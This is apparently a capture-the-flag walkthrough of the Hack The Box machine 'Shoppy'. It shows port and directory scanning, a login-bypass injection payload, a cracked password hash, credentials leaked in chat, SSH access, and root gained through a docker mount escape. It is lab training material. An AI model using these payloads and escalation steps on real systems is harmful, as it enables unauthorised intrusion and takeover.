Reconnaissance
1
nmap -sV -sC <target-ip>
Results
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-15 21:13 EST
Nmap scan report for 10.10.11.180
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9e5e8351d99f89ea471a12eb81f922c0 (RSA)
| 256 5857eeeb0650037c8463d7a3415b1ad5 (ECDSA)
|_ 256 3e9d0a4290443860b3b62ce9bd9a6754 (ED25519)
80/tcp open http nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.92 seconds
Β
Look like thereβs nothing much usefull!!
Directory bruteforcing
1
gobuster dir -b 404,301 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 500 -u http://shoppy.htb
Results:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
βββ(rootγΏkali/machines/shoppy-HTB)
[
ββ# gobuster dir -b 404,301 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 500 -u http://shoppy.htb
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://shoppy.htb
[+] Method: GET
[+] Threads: 500
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,301
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/16 00:46:53 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 302) [Size: 28] [--> /login]
/login (Status: 200) [Size: 1074]
/Login (Status: 200) [Size: 1074]
Progress: 3984 / 220561 (1.81%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/16 00:46:58 Finished
===============================================================
We got login and admin page on shoppy.htb
Letβs try sqli here!
username : admin'||'1==1
password : random
Boom!! we logged in
try out again the same sqli here!
<img width="520" alt="sqli-after-admin" src="https://user-images.githubusercontent.com/95465072/208038413-8b3e3f82-e8f5-4f4f-b8d5-9a3264871104.png">
Download the transcirpt!
great! we got **josh** user's password hash
<img width="461" alt="pass-user-afteradmin-download" src="https://user-images.githubusercontent.com/95465072/208038531-1e1741e0-9ce4-438d-9de1-db802d67c5e6.png">
[crack this hash here](https://crackstation.net/)
<img width="786" alt="hash-for-josh" src="https://user-images.githubusercontent.com/95465072/208038459-27930a24-ad73-43b6-ae02-44f679fefe1e.png">
|hash|password |
|--|--|
| 6ebcea65320589ca4f2f1ce039975995| remembermethisway |
## Subdomain Enumeration
```sh
gobuster vhost -w /usr/share/wordlists/SecLists/bitquark-subdomains-top100000.txt -t 50 -u shoppy.htb --no-error
Results:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
βββ(rootγΏkali)-[/usr/share/wordlists/SecLists]
ββ# gobuster vhost -w /usr/share/wordlists/SecLists/bitquark-subdomains-top100000.txt -t 50 -u shoppy.htb --no-error
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://shoppy.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/SecLists/bitquark-subdomains-top100000.txt
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
[+] Append Domain: false
===============================================================
2022/12/16 01:08:10 Starting gobuster in VHOST enumeration mode
===============================================================
mattermost (Status: 200) [Size: 1074]
We got the subdomain http://mattermost.shoppy.htb add this to /etc/hosts
login as josh
username josh password remembermethisway
Boom! in the comments section we got
1
2
3
4
5
6
7
8
jaeger
4:22 AM
Hey @josh,
For the deploy machine, you can create an account with these creds :
username: jaeger
password: Sh0ppyBest@pp!
And deploy on it.
Based on this comment we can try ssh
1
ssh jaeger@shoppy.htb
password : Sh0ppyBest@pp!
Got the user flag!!
1
2
3
4
5
6
7
jaeger@shoppy:~$ ls
Desktop Music ShoppyApp user.txt
Documents Pictures shoppy_start.sh Videos
Downloads Public Templates
jaeger@shoppy:~$ cat user.txt
3056a9074c4c2bd189e9************
jaeger@shoppy:~$
Privilege Escalation
1
sudo -l
By this we can see that we can execute password-manager as root user!
1
cat /home/deploy/password-manager
sudo -u deploy /home/deploy/password-manager
Try this with ssh again
ssh deploy@shoppy.htb
password : Deploying@pp!
It looks like we are in the docker container! letβs try it out with gtfobins payload for sudo
gtfobins β> docker β> sudo
1
docker run -v /:/mnt --rm -it alpine chroot /mnt sh